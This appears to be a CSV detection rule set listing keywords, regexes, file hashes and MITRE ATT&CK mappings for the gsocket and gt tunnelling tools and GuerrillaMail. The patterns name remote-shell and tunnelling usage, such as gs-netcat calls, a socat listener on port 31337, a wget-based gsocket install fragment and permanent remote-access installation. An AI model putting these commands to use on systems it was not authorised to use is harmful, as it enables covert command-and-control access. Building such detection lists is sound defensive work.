"*fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063*",".{0,1000}fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*GS_SO_TOR_DOMAIN*",".{0,1000}GS_SO_TOR_DOMAIN.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-full-pipe -s *",".{0,1000}gs\-full\-pipe\s\-s\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat *.tar.gz*",".{0,1000}gs\-netcat\s.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_freebsd-x86_64*",".{0,1000}gs\-netcat_freebsd\-x86_64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-aarch64*",".{0,1000}gs\-netcat_linux\-aarch64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-arm*",".{0,1000}gs\-netcat_linux\-arm.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-armhf*",".{0,1000}gs\-netcat_linux\-armhf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-armv6*",".{0,1000}gs\-netcat_linux\-armv6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-armv7l*",".{0,1000}gs\-netcat_linux\-armv7l.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-i686*",".{0,1000}gs\-netcat_linux\-i686.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-mips32*",".{0,1000}gs\-netcat_linux\-mips32.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-mips64*",".{0,1000}gs\-netcat_linux\-mips64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-mipsel*",".{0,1000}gs\-netcat_linux\-mipsel.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_linux-x86_64*",".{0,1000}gs\-netcat_linux\-x86_64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_macOS*",".{0,1000}gs\-netcat_macOS.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-netcat_openbsd-x86_64*",".{0,1000}gs\-netcat_openbsd\-x86_64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket -k *",".{0,1000}gsocket\s\-k\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket openvpn --*",".{0,1000}gsocket\sopenvpn\s\-\-.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket/gsocket.h*",".{0,1000}gsocket\/gsocket\.h.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*GSOCKET_SECRET*",".{0,1000}GSOCKET_SECRET.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*GSOCKET_SOCKS_IP*",".{0,1000}GSOCKET_SOCKS_IP.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*GSOCKET_SOCKS_PORT*",".{0,1000}GSOCKET_SOCKS_PORT.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gsocket-relay/monitor/*",".{0,1000}gsocket\-relay\/monitor\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-sftp -l*",".{0,1000}gs\-sftp\s\-l.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*gs-sftp -s thctestserver*",".{0,1000}gs\-sftp\s\-s\sthctestserver.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*hackerschoice/gsocket*",".{0,1000}hackerschoice\/gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*https://gsocket.io/install.sh*",".{0,1000}https\:\/\/gsocket\.io\/install\.sh.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*Installing systemwide remote access permanentally*",".{0,1000}Installing\ssystemwide\sremote\saccess\spermanentally.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*Join us on Telegram - https://t.me/thcorg*",".{0,1000}Join\sus\son\sTelegram\s\-\shttps\:\/\/t\.me\/thcorg.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*Running: netcat *",".{0,1000}Running\:\snetcat\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*socat - TCP_LISTEN:31337*",".{0,1000}socat\s\-\sTCP_LISTEN\:31337.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*TCP:gsocket:31337*",".{0,1000}TCP\:gsocket\:31337.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*Testing Global Socket Relay Network*",".{0,1000}Testing\sGlobal\sSocket\sRelay\sNetwork.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*wget -qO- gsocket.io*",".{0,1000}wget\s\-qO\-\sgsocket\.io.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* gt-win-x86_64.exe*",".{0,1000}\sgt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*/gt server -c ./config.yml*",".{0,1000}\/gt\sserver\s\-c\s\.\/config\.yml.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*/gt-win-x86_64.exe*",".{0,1000}\/gt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*/opt/config/aonetwork-client.yml*",".{0,1000}\/opt\/config\/aonetwork\-client\.yml.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*/opt/entrypoint.sh*",".{0,1000}\/opt\/entrypoint\.sh.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" 
"*/release/gt-win-x86_64.exe*",".{0,1000}\/release\/gt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*/usr/bin/gt client-c *",".{0,1000}\/usr\/bin\/gt\sclient\-c\s.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*/x86_64-pc-windows-msvc/release/gt.exe*",".{0,1000}\/x86_64\-pc\-windows\-msvc\/release\/gt\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*/x86_64-pc-windows-msvc/release/gt.exe*",".{0,1000}\/x86_64\-pc\-windows\-msvc\/release\/gt\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*\gt-win-x86_64.exe*",".{0,1000}\\gt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" 
"*\x86_64-pc-windows-msvc\release\gt.exe*",".{0,1000}\\x86_64\-pc\-windows\-msvc\\release\\gt\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*037be40510a193376a127023deb2fe312d265b5ebc78422879e9126c5d02f2b4*",".{0,1000}037be40510a193376a127023deb2fe312d265b5ebc78422879e9126c5d02f2b4.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*1a535e15b11923cd368d6b39e1a308b67d7ed2be686d7968aa50e5c3630ea11a*",".{0,1000}1a535e15b11923cd368d6b39e1a308b67d7ed2be686d7968aa50e5c3630ea11a.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*1f51e236e7e1fbeb8cf38462e17da4d1921aeef093e2990538a4eb1d35554076*",".{0,1000}1f51e236e7e1fbeb8cf38462e17da4d1921aeef093e2990538a4eb1d35554076.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*2a17ed79b4a0cb9d1c6345ee3f0d1c6d349a660391345c17e78ceb57a26a32fe*",".{0,1000}2a17ed79b4a0cb9d1c6345ee3f0d1c6d349a660391345c17e78ceb57a26a32fe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 
- T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*300161cd89c6094776ad40c08308249c7323c9b19105e09f15ef209f4e1f7980*",".{0,1000}300161cd89c6094776ad40c08308249c7323c9b19105e09f15ef209f4e1f7980.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*56be52735563e73f0cdf9d4e8b52f86ccc5313495eec99c69c6f2bfeb0a08317*",".{0,1000}56be52735563e73f0cdf9d4e8b52f86ccc5313495eec99c69c6f2bfeb0a08317.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*71e29bff6cee7938472b8d16ea5696b4966cb587a266c43257770efffed93aae*",".{0,1000}71e29bff6cee7938472b8d16ea5696b4966cb587a266c43257770efffed93aae.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*ab894c2ffa7886fe889c4a35b15fc5d5558d11896550d563c299408e6d4da363*",".{0,1000}ab894c2ffa7886fe889c4a35b15fc5d5558d11896550d563c299408e6d4da363.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" 
"*c46ac57304fda332b5c3b027ae3fd0a54917e2b194f0d9f13e6cacfa1f61ff53*",".{0,1000}c46ac57304fda332b5c3b027ae3fd0a54917e2b194f0d9f13e6cacfa1f61ff53.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*ed1f4ff9004e7065939247b9df3e4d51e08a0c990931e438b733fb4e64b4adf2*",".{0,1000}ed1f4ff9004e7065939247b9df3e4d51e08a0c990931e438b733fb4e64b4adf2.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*ghcr.io/ao-space/gt:client-dev*",".{0,1000}ghcr\.io\/ao\-space\/gt\:client\-dev.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*ghcr.io/ao-space/gt:server-dev*",".{0,1000}ghcr\.io\/ao\-space\/gt\:server\-dev.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*github*ao-space/gt*",".{0,1000}github.{0,1000}ao\-space\/gt.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*linux-amd64-client -local http://127.0.0.1*",".{0,1000}linux\-amd64\-client\s\-local\shttp\:\/\/127\.0\.0\.1.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*linux-amd64-server -addr *",".{0,1000}linux\-amd64\-server\s\-addr\s.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z" "*http://api.guerrillamail.com/ajax.php?*",".{0,1000}http\:\/\/api\.guerrillamail\.com\/ajax\.php\?.{0,1000}","greyware_tool_keyword","guerrillamail","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.guerrillamail.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://www.guerrillamail.com/compose*",".{0,1000}https\:\/\/www\.guerrillamail\.com\/compose.{0,1000}","greyware_tool_keyword","guerrillamail","disposable email address to use anytime.","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.guerrillamail.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://www.guerrillamail.com/inbox*",".{0,1000}https\:\/\/www\.guerrillamail\.com\/inbox.{0,1000}","greyware_tool_keyword","guerrillamail","disposable email address to use anytime.","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.guerrillamail.com","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A" 
